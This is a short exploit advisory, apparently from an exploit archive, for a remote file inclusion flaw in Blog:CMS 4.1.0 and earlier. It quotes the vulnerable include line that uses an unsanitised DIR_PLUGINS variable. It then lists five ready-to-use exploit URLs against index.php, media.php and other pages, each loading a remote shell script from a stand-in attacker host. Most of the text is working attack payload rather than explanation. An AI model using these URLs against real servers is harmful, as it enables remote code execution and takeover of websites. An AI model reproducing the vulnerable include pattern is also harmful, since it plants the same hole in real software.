Blog:CMS versions 4.1.0 and below suffer from a remote file inclusion flaw.
f548cb12dcabab82dcd48af1859f00f8bffe6f9b488c2fdd8bf62bf767423a3a
Blog:Cms <= 4.1.0 Remote Inclusion File
Bug Found by Drago84 ToxiC CreW
Site Vendor :http://blogcms.com/
Page affetc:
index.php
media.php
archive.php
archives.php
blog.php
The Problem is:
include($DIR_PLUGINS."related/nusoap.php");
Expl:
http://www.sito.com/dir_blogccms/index.php?DIR_PLUGINS=http://evalsite.com/shell.php?
http://www.sito.com/dir_blogccms/admin/media.php?DIR_PLUGINS=http://evalsite.com/shell.php?
http://www.sito.com/dir_blogccms/extras/fancyurls/archive.php?DIR_PLUGINS=http://evalsite.com/shell.php?
http://www.sito.com/dir_blogccms/extras/fancyurls/archives.php?DIR_PLUGINS=http://evalsite.com/shell.php?
http://www.sito.com/dir_blogccms/extras/fancyurls/blog.php?DIR_PLUGINS=http://evalsite.com/shell.php?